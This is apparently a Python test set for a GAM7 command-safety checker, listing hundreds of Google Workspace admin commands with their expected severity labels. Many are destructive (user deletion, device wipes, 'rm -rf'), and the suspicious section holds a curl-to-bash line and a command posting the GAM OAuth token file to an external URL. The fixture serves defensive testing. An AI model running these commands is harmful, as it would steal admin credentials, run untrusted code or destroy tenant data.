"""Blind adversarial set for gamcheck 0.2.0, written BEFORE running the checker on it.

Each case: id, text, lang ('shell'|'powershell'|'batch'|'python'|'gambatch'|'paste'),
expect, mode ('exact' or 'floor'), src = GAM7 7.48.07 source citation
(gam/__init__.py line, or GamCommands.txt line as GC:n) that justifies the level.
Policy = labels.json policy: what running it on GAM7 7.48.07 does to the tenant.
A rejected command is CANNOT TELL; floor means the verdict must be at least this severe
(READ < CHANGES < CANNOT TELL < DESTRUCTIVE < SUSPICIOUS), and an over-warning is accepted.
"""
R, C, U, D, S = 'READ-ONLY', 'CHANGES', 'CANNOT TELL', 'DESTRUCTIVE', 'SUSPICIOUS'

CASES = [
    # --- A. danger words used as values
    ('A1', 'gam print users query "orgUnitPath=\'/Delete Me\'"', 'shell', R, 'exact', 'GC: print users [query <QueryUser>]; query is a string'),
    ('A2', 'gam info group purge@example.com', 'shell', R, 'exact', 'info reads'),
    ('A3', 'gam user doit@example.com print filelist', 'shell', R, 'exact', 'print reads'),
    ('A4', 'gam update group preview@example.com add member doit@example.com', 'shell', C, 'exact', 'GC:3931 add; doit@ is the UserItem'),
    ('A5', 'gam user bob@example.com delete messages query doit', 'shell', R, 'exact', '74968 query consumes the next string; 75325 no doit'),
    ('A6', 'gam user bob@example.com delete messages query "x" matchlabel doit', 'shell', R, 'exact', '74978 matchlabel consumes "doit" as a label name; 75325 no doit (over-warn acceptable)'),
    ('A7', 'gam user bob@example.com delete drivefile name untrash', 'shell', D, 'floor', '65815 default trash; "untrash" is the file name'),
    ('A8', 'gam update group sales@example.com sync member file removeonly', 'shell', D, 'floor', '35449 sync; file removeonly is the entity'),
    ('A9', 'gam user bob@example.com sync licenses 1010020020 preview', 'shell', R, 'exact', 'GC:8409; 72562-72563 preview'),
    ('A10', 'gam user bob@example.com delete license preview', 'shell', D, 'floor', '72542 preview read as SKU -> GAM rejects; checker must not read it as a switch'),
    ('A11', 'gam update group sales@example.com sync member addonly file u.txt', 'shell', C, 'exact', '35550 addonly never removes'),
    # --- B. doit / preview / addonly / removeonly / untrash / purge in every position
    ('B1', 'gam user bob@example.com delete messages doit query older_than:1y', 'shell', D, 'exact', '74967-75027 option loop, doit accepted anywhere; 75325 gate'),
    ('B2', 'gam user bob@example.com delete messages query older_than:1y doit max_to_delete 0', 'shell', D, 'exact', '75325'),
    ('B3', 'gam user bob@example.com delete messages max_to_delete 0 doit query older_than:1y', 'shell', D, 'exact', '75325'),
    ('B4', 'gam user bob@example.com trash messages doit matchlabel INBOX', 'shell', D, 'exact', '75325 (trash uses _processMessagesThreads)'),
    ('B5', 'gam user bob@example.com modify messages removelabel INBOX doit query "x"', 'shell', C, 'exact', '75259-75262 modify; 75325 gate'),
    ('B6', 'gam user bob@example.com archive messages archive@example.com query "x" doit', 'shell', C, 'exact', '75125 gate; archive copies to a group'),
    ('B7', 'gam user bob@example.com archive messages archive@example.com query "x"', 'shell', R, 'exact', '75125 no doit'),
    ('B8', 'gam user bob@example.com delete events primary doit', 'shell', D, 'exact', 'GC:6478 EventEntity optional -> all events; 42716 doit; 42391 gate'),
    ('B8b', 'gam user bob@example.com delete events primary eventid abc doit', 'shell', D, 'exact', '42716'),
    ('B8c', 'gam user bob@example.com delete events primary eventid doit', 'shell', R, 'exact', 'eventid consumes "doit" as the id; 42391 no doit'),
    ('B9', 'gam calendar cal@example.com deleteevent id abc doit', 'shell', D, 'exact', 'GC:1989; 42793'),
    ('B10', 'gam calendar cal@example.com delete event id abc', 'shell', R, 'exact', '42786; 42391 no doit'),
    ('B11', 'gam calendars cal@example.com purge event id abc doit', 'shell', D, 'exact', '42910'),
    ('B12', 'gam user bob@example.com purge events primary doit', 'shell', D, 'exact', '55938'),
    ('B13', 'gam user bob@example.com wipe events primary', 'shell', D, 'exact', '55951 no doit gate at all'),
    ('B14', 'gam user bob@example.com delete filerevision 1abc select first doit', 'shell', D, 'exact', '59383'),
    ('B15', 'gam user bob@example.com delete filerevision 1abc doit select first', 'shell', D, 'exact', '59376 loop order-free'),
    ('B16', 'gam user bob@example.com update filerevision 1abc select last published true', 'shell', R, 'exact', '59473, 59509 not performed'),
    ('B17', 'gam delete device devices/abc doit', 'shell', D, 'exact', 'GC:4340; 31598'),
    ('B18', 'gam update device devices/abc action wipe doit', 'shell', D, 'exact', 'GC:4341; 31723 DEVICE_ACTION_CHOICES wipe; 31598'),
    ('B19', 'gam update deviceuser devices/abc/deviceUsers/x action wipe doit', 'shell', D, 'exact', 'GC:4376; 32224'),
    ('B20', 'gam update mobile abc action wipe doit', 'shell', D, 'exact', '33977 wipe=admin_remote_wipe; 34060 gate'),
    ('B21', 'gam update mobile abc action admin_account_wipe doit', 'shell', D, 'exact', '33974'),
    ('B22', 'gam update mobile abc action wipe', 'shell', R, 'exact', '34060 no doit'),
    ('B23', 'gam update mobile abc action approve doit', 'shell', C, 'exact', '33978'),
    ('B24', 'gam update cros deviceId action deprovision_same_model_replacement acknowledge_device_touch_requirement', 'shell', D, 'exact', '24253/24263 Act.DEPROVISION, no doit; VERB_LEVEL says deprovision is DESTRUCTIVE'),
    ('B25', 'gam update group sales@example.com add member preview bob@example.com', 'shell', R, 'exact', 'GC:3931-3936; 35018'),
    ('B26', 'gam update group sales@example.com delete member preview bob@example.com', 'shell', R, 'exact', '35417-35420; 35105'),
    ('B27', 'gam update group sales@example.com sync member addonly file u.txt', 'shell', C, 'exact', '35550'),
    ('B28', 'gam update group sales@example.com sync member removeonly file u.txt', 'shell', D, 'exact', '35559 removes only'),
    ('B29', 'gam update group sales@example.com sync member addonly removeonly file u.txt', 'shell', D, 'floor', '34823 last choice wins -> removeonly'),
    ('B30', 'gam update group sales@example.com clear member preview', 'shell', R, 'exact', '35622 preview in clear branch'),
    ('B31', 'gam update group sales@example.com clear', 'shell', D, 'exact', 'GC:3957'),
    ('B32', 'gam update cigroups sales@example.com sync member preview file u.txt', 'shell', R, 'exact', '38551'),
    ('B33', 'gam user bob@example.com transfer drive alice@example.com preview', 'shell', R, 'exact', '67166; 67272'),
    ('B34', 'gam user bob@example.com transfer ownership 1abc alice@example.com preview', 'shell', R, 'exact', '67449; 67541 continue'),
    ('B35', 'gam user bob@example.com claim ownership 1abc preview', 'shell', R, 'exact', '67799'),
    ('B36', 'gam user bob@example.com collect orphans preview', 'shell', R, 'exact', '66376; 66415'),
    ('B37', 'gam user bob@example.com delete license 1010020020 preview', 'shell', R, 'exact', 'GC:8408; 72738'),
    ('B38', 'gam user bob@example.com update license 1010020020 from 1010340007 preview', 'shell', R, 'exact', '72683-72697 (checker has no preview key for update license; over-warn acceptable)'),
    ('B39', 'gam user bob@example.com delete drivefile 1abc untrash', 'shell', C, 'exact', '65815; GC:7137'),
    ('B40', 'gam user bob@example.com delete drivefile 1abc trash', 'shell', D, 'exact', '65807'),
    ('B41', 'gam user bob@example.com delete drivefile 1abc purge', 'shell', D, 'exact', '65807 purge=delete'),
    ('B42', 'gam user bob@example.com untrash drivefile 1abc', 'shell', C, 'exact', 'GC:7140'),
    ('B43', 'gam user bob@example.com purge drivefile 1abc', 'shell', D, 'exact', 'GC:7138'),
    ('B45', 'gam delete sakeys abc123', 'shell', D, 'exact', '13247 doit only guards the current key'),
    ('B46', 'gam cros_sn 5CD1 issuecommand doit command wipe_users', 'shell', D, 'exact', '24443 loop order-free; 24465'),
    ('B47', 'gam cros_sn 5CD1 issuecommand command reboot doit', 'shell', C, 'exact', 'REBOOT not doit-required'),
    ('B48', 'gam cros_sn 5CD1 issuecommand command remote_powerwash', 'shell', R, 'exact', '24465-24467 refused without doit'),
    ('B49', 'gam user bob@example.com update calattendees primary eventid abc add carol@example.com doit', 'shell', C, 'exact', '56091; 56252'),
    ('B50', 'gam user bob@example.com update calattendees primary eventid abc delete carol@example.com', 'shell', R, 'exact', '56252 no doit'),
    ('B51', 'gam user bob@example.com update calattendees primary eventid abc delete carol@example.com doit dryrun', 'shell', R, 'exact', '56093 dryrun after doit resets it (over-warn acceptable)'),
    # --- C. multi-word entity selectors
    ('C1', 'gam csvkmd users u.csv keyfield email delete messages query "x" doit', 'shell', D, 'exact', '75325'),
    ('C2', 'gam datafile users u.txt delete users', 'shell', D, 'exact', 'GC:6041'),
    ('C3', 'gam query "orgUnitPath=\'/Leavers\'" delete users', 'shell', D, 'exact', 'GC:6041'),
    ('C4', 'gam ou_and_children /Staff update users suspended on', 'shell', C, 'exact', 'update users'),
    ('C5', 'gam ou_and_children /Staff print users', 'shell', R, 'exact', 'print'),
    ('C6', 'gam group sales@example.com delete users', 'shell', D, 'exact', 'GC:6041; entity = members'),
    ('C7', 'gam file users.txt sync licenses 1010020020 addonly', 'shell', C, 'exact', '72795 addonly'),
    ('C8', 'gam update group csvkmd m.csv keyfield group datafield email sync member preview csvdata email', 'shell', R, 'exact', '35622'),
    ('C9', 'gam update group csvkmd m.csv keyfield group datafield email sync member csvdata email', 'shell', D, 'exact', '35559'),
    ('C10', 'gam all users delete messages query "in:trash" doit', 'shell', D, 'exact', '75325'),
    ('C11', 'gam all users_ns print filelist', 'shell', R, 'exact', 'print'),
    ('C12', 'gam cros_ou /Devices update action disable', 'shell', C, 'exact', 'GC:2486; 24256'),
    # --- D. csv / loop / batch / tbatch wrappers
    ('D1', 'gam csv users.csv gam user ~email delete messages query "x" doit', 'shell', D, 'exact', '75325'),
    ('D2', 'gam csv users.csv gam user ~email delete messages query "x"', 'shell', R, 'exact', '75325 no doit'),
    ('D3', 'gam csv users.csv gam user ~email delete messages query "x" ~doit', 'shell', D, 'floor', 'doit decided per row'),
    ('D4', 'gam loop users.csv gam update group ~group delete member ~email', 'shell', D, 'exact', '35417'),
    ('D5', 'gam batch commands.txt', 'shell', U, 'exact', 'file not provided'),
    ('D6', 'gam tbatch commands.txt', 'shell', U, 'exact', 'file not provided'),
    ('D7', 'gam csv users.csv gam ~cmd user ~email', 'shell', U, 'exact', 'verb from the row'),
    ('D8', 'gam csv - gam delete user ~primaryEmail', 'shell', D, 'exact', 'delete user'),
    ('D9', 'gam redirect csv - multiprocess csv users.csv gam user ~email print filelist', 'shell', R, 'exact', 'print'),
    ('D10', 'gam redirect csv - todrive csv users.csv gam user ~email print filelist', 'shell', C, 'exact', 'policy: todrive = CHANGES'),
    ('D11', 'gam csv users.csv matchfield role owner gam update group ~group update owner ~email', 'shell', C, 'exact', '35565'),
    ('D12', 'gam config auto_batch_min 1 csv users.csv gam delete user ~email', 'shell', D, 'exact', 'delete user'),
    # --- E. shell chaining, quoting, prefixes
    ('E1', 'gam print users > users.csv && gam delete user bob@example.com', 'shell', D, 'exact', 'delete user'),
    ('E2', 'gam info user bob@example.com || gam create user bob@example.com password random', 'shell', C, 'exact', 'create user'),
    ('E3', 'gam print users | grep -v Admin | gam csv - gam delete user ~primaryEmail', 'shell', D, 'exact', 'delete user'),
    ('E4', 'gam print users; gam update group sales@example.com sync member file u.txt', 'shell', D, 'exact', '35559'),
    ('E5', 'gam print users\nbash -c "gam delete user bob@example.com"', 'shell', D, 'floor', 'delete user runs inside bash -c'),
    ('E6', 'gam print users\nsudo -u gamadmin gam delete user bob@example.com', 'shell', D, 'floor', 'delete user'),
    ('E7', 'gam print users\ntimeout 300 gam delete user bob@example.com', 'shell', D, 'floor', 'delete user'),
    ('E8', 'gam print users\nnice -n 10 gam delete user bob@example.com', 'shell', D, 'floor', 'delete user'),
    ('E9', 'gam print users\nssh admin@gamhost gam delete user bob@example.com', 'shell', D, 'floor', 'delete user on the remote host'),
    ('E10', 'gam print users\nresult="$(gam delete user bob@example.com)"', 'shell', D, 'floor', 'delete user inside a quoted substitution'),
    ('E11', 'GAM=$(command -v gam)\n$GAM print users\n$GAM delete user bob@example.com', 'shell', D, 'floor', 'delete user via a variable resolved at runtime'),
    ('E12', 'gam print users\npython3 /opt/gam/gam.py delete user bob@example.com', 'shell', D, 'floor', 'delete user via the interpreter'),
    ('E13', 'gam print users 2>&1 | tee log.txt', 'shell', R, 'exact', 'print'),
    ('E14', 'for u in $(gam print users query "orgUnitPath=/Leavers" | tail -n +2); do gam delete user "$u"; done', 'shell', D, 'exact', 'delete user'),
    ('E15', 'xargs -I{} gam delete user {} < leavers.txt', 'shell', D, 'exact', 'delete user'),
    ('E16', 'cat leavers.txt | while read -r u; do gam update user "$u" suspended on; done', 'shell', C, 'exact', 'update user suspended'),
    ('E17', 'gam print users\neval "gam delete user bob@example.com"', 'shell', U, 'floor', 'eval'),
    ('E18', 'env GAMCFGDIR=/tmp gam delete user bob@example.com', 'shell', D, 'exact', 'delete user'),
    ('E19', 'gam print users\ncaffeinate -i gam delete user bob@example.com', 'shell', D, 'floor', 'delete user'),
    ('E20', 'gam print users\nsu - gamadmin -c "gam delete user bob@example.com"', 'shell', D, 'floor', 'delete user'),
    # --- F. PowerShell and batch
    ('F1', '& "C:\\GAM7\\gam.exe" delete user bob@example.com', 'powershell', D, 'exact', 'delete user'),
    ('F2', '$gam = "C:\\GAM7\\gam.exe"\n& $gam print users\n& $gam delete user bob@example.com', 'powershell', D, 'exact', 'delete user'),
    ('F3', 'gam print users\n$gam = Join-Path $env:GAMDIR "gam.exe"\n& $gam delete user bob@example.com', 'powershell', D, 'floor', 'delete user via a computed path'),
    ('F4', 'gam print users\nStart-Process -FilePath gam -ArgumentList "delete user bob@example.com" -Wait', 'powershell', D, 'floor', 'delete user via Start-Process'),
    ('F5', 'gam user bob@example.com delete messages query "older_than:1y" `\n  doit', 'powershell', D, 'exact', '75325'),
    ('F6', 'Invoke-Expression "gam delete user bob@example.com"', 'powershell', S, 'floor', 'iex'),
    ('F7', 'gam print users\ncmd /c gam delete user bob@example.com', 'powershell', D, 'floor', 'delete user via cmd /c'),
    ('F8', 'foreach ($u in $users) { gam delete user $u.PrimaryEmail }', 'powershell', D, 'exact', 'delete user'),
    ('F9', 'gam print users\nset GAM="C:\\GAM7\\gam.exe"\n%GAM% delete user bob@example.com', 'batch', D, 'floor', 'delete user via a quoted set'),
    ('F10', 'call gam delete user bob@example.com', 'batch', D, 'exact', 'delete user'),
    ('F11', 'gam print users\nstart "" gam delete user bob@example.com', 'batch', D, 'floor', 'delete user via start'),
    ('F12', 'for /f "tokens=*" %%a in (\'gam print users query "orgUnitPath=/Leavers"\') do gam delete user %%a', 'batch', D, 'exact', 'delete user'),
    ('F13', 'gam user %USER% delete messages query "older_than:1y" ^\n doit', 'batch', D, 'exact', '75325'),
    ('F14', 'gam print users\npowershell -Command "gam delete user bob@example.com"', 'batch', D, 'floor', 'delete user via powershell -Command'),
    ('F15', 'gam print users\n"C:\\Program Files\\GAM7\\gam.exe" delete user bob@example.com', 'batch', D, 'exact', 'delete user, quoted path'),
    # --- G. curly quotes and copied prompts (paste mode)
    ('G1', '$ gam user bob@example.com delete messages query \u201colder_than:1y\u201d doit', 'paste', D, 'exact', '75325'),
    ('G2', 'PS C:\\GAM7> gam delete user bob@example.com', 'paste', D, 'exact', 'delete user'),
    ('G3', 'C:\\GAM7>gam print users', 'paste', R, 'exact', 'print'),
    ('G4', '> gam update group sales@example.com sync member file \u2018u.txt\u2019', 'paste', D, 'exact', '35559'),
    ('G5', 'gam user bob@example.com delete messages query \u201cx\u201d', 'paste', U, 'exact', 'curly quotes flagged; no doit'),
    # --- H. mixed case, underscores, hyphens
    ('H1', 'gam User bob@example.com Delete Messages Query x DOIT', 'shell', D, 'exact', '920 getArgument lower-cases'),
    ('H2', 'gam user bob@example.com delete messages query x do_it', 'shell', D, 'exact', '923 underscores dropped -> doit'),
    ('H3', 'gam user bob@example.com delete messages query x do-it', 'shell', R, 'exact', '923 keeps hyphens -> unknownArgumentExit, nothing runs (over-warn acceptable)'),
    ('H4', 'gam update_group sales@example.com add member bob@example.com', 'shell', U, 'exact', 'not a GAM7 command'),
    ('H5', 'gam user bob@example.com delete_messages query x doit', 'shell', U, 'exact', '973 getChoice: deletemessages is not a user command'),
    ('H6', 'gam user bob@example.com delete messages query x doIt', 'shell', D, 'exact', '920'),
    ('H7', 'gam update group sales@example.com ADD MEMBER bob@example.com', 'shell', C, 'exact', '973 lower-cases'),
    ('H8', 'gam update mobile abc action WIPE doit', 'shell', D, 'exact', '33977; 973'),
    ('H9', 'gam UPDATE GROUP sales@example.com sync member file u.txt', 'shell', D, 'exact', '35559'),
    ('H10', 'gam user bob@example.com delete messages query x doit', 'shell', D, 'exact', 'control'),
    # --- I. commands GAM7 rejects, relation deletes, misc
    ('I1', 'gam print gal', 'shell', R, 'exact', 'legacy only; reads'),
    ('I2', 'gam user bob@example.com delete messages query x doit extra_arg', 'shell', D, 'floor', '75027 unknownArgumentExit; over-warn acceptable'),
    ('I3', 'gam delete users bob@example.com', 'shell', D, 'exact', 'main delete users'),
    ('I4', 'gam user bob@example.com delete calendars cal@example.com', 'shell', C, 'exact', '55383 calendarList delete'),
    ('I5', 'gam user bob@example.com remove calendars cal@example.com', 'shell', D, 'exact', '55447 calendars().delete'),
    ('I6', 'gam user bob@example.com delete groups', 'shell', D, 'exact', '71856 removes from all groups'),
    ('I7', 'gam update org /Leavers sync file u.txt removetoou /Staff', 'shell', C, 'exact', 'GC:4579 moves users'),
    ('I8', 'gam update group sales@example.com email new@example.com', 'shell', C, 'exact', 'GC:3925'),
    ('I9', 'gam update group sales@example.com description "delete all"', 'shell', C, 'exact', 'settings'),
    ('I10', 'gam update group sales@example.com name delete', 'shell', C, 'exact', 'name takes a value (over-warn acceptable)'),
    ('I11', 'gam delete group sales@example.com', 'shell', D, 'exact', '35703'),
    ('I12', 'gam user bob@example.com empty drivetrash', 'shell', D, 'exact', 'empty'),
    ('I13', 'gam user bob@example.com delete drivefileacl 1abc alice@example.com', 'shell', D, 'exact', 'GC:7228'),
    ('I14', 'gam oauth delete', 'shell', D, 'exact', 'oauth delete'),
    ('I15', 'gam oauth info', 'shell', R, 'exact', 'oauth info'),
    ('I16', 'gam user bob@example.com forward on alice@example.com', 'shell', C, 'exact', 'forward'),
    ('I17', 'gam create datatransfer bob@example.com drive alice@example.com', 'shell', C, 'exact', 'create'),
    ('I18', 'gam user bob@example.com print', 'shell', R, 'exact', 'print users default'),
    ('I19', 'gam undelete user bob@example.com', 'shell', C, 'exact', 'undelete'),
    ('I20', 'gam user bob@example.com delete messages', 'shell', U, 'floor', '75046 missingArgumentExit; nothing runs, but the checker must not say READ-ONLY dry run of nothing... accepted READ too'),
    ('I21', 'gam update group', 'shell', U, 'floor', 'incomplete'),
    ('I22', 'gam print users todrive', 'shell', C, 'exact', 'policy todrive'),
    ('I23', 'gam user bob@example.com delete messages ids 123,456', 'shell', D, 'exact', '75318 ids skip the doit gate'),
    ('I24', 'gam user bob@example.com delete messages labelids Label_1', 'shell', R, 'exact', '75318 messageEntity None -> 75325 gate'),
    ('I25', 'gam user bob@example.com delete messages query "x" or matchlabel Y doit', 'shell', D, 'exact', '74991 or; 75325'),
    ('I26', 'gam user bob@example.com sync licenses 1010020020 removeonly', 'shell', D, 'exact', '72795'),
    ('I27', 'gam select prod delete user bob@example.com', 'shell', D, 'exact', 'delete user'),
    ('I28', 'gam redirect stdout - multiprocess redirect stderr stdout delete user bob@example.com', 'shell', D, 'exact', 'delete user'),
    ('I29', 'gam update group sales@example.com sync member preview file u.txt', 'shell', R, 'exact', '35622'),
    # --- J. Python
    ('J1', 'import subprocess\nsubprocess.run("gam print users > u.csv && gam delete user bob@example.com", shell=True)', 'python', D, 'floor', 'delete user after &&'),
    ('J2', 'import os, subprocess\nsubprocess.run(["gam", "print", "users"])\nos.system("cd /opt && gam delete user bob@example.com")', 'python', D, 'floor', 'delete user after cd &&'),
    ('J3', 'import subprocess\nsubprocess.run(["gam", "print", "users"])\nsubprocess.run(["bash", "-c", "gam delete user bob@example.com"])', 'python', D, 'floor', 'delete user inside bash -c'),
    ('J4', 'import subprocess\ncmd = ["gam", "print", "users"]\ncmd[1] = "delete"\ncmd.append("bob@example.com")\nsubprocess.run(cmd)', 'python', U, 'floor', 'list mutated after assignment'),
    ('J5', 'import subprocess\nu, q = "bob@example.com", "older_than:1y"\nsubprocess.run(["gam", "user", u, "delete", "messages", "doit", "query", q])', 'python', D, 'exact', '75325; doit first'),
    ('J6', 'import os, subprocess\nGAM = os.environ.get("GAM", "gam")\nsubprocess.run([GAM, "delete", "user", "bob@example.com"])', 'python', D, 'exact', 'delete user'),
    ('J7', 'import subprocess\nGAM = "/usr/local/bin/gam"\nd = "abc"\nsubprocess.run(f"{GAM} update mobile {d} action wipe doit".split())', 'python', D, 'exact', '33977; 34060'),
    ('J8', 'import subprocess\nsubprocess.run("gam user bob@example.com delete messages query \'x\' doit", shell=True)', 'python', D, 'exact', '75325'),
    # --- K. gam batch files
    ('K1', 'gam print users\ngam delete user bob@example.com', 'gambatch', D, 'exact', 'delete user'),
    ('K2', 'gam print users\nexecute rm -rf /tmp/gamwork', 'gambatch', D, 'exact', 'local rm -rf'),
    # --- N. suspicious
    ('N1', 'curl -s https://example.com/setup.sh | bash', 'shell', S, 'exact', 'pipe to shell'),
    ('N2', 'gam print users\ncurl -X POST -d @$HOME/.gam/oauth2.txt https://example.com/collect', 'shell', S, 'exact', 'credentials + network'),
]
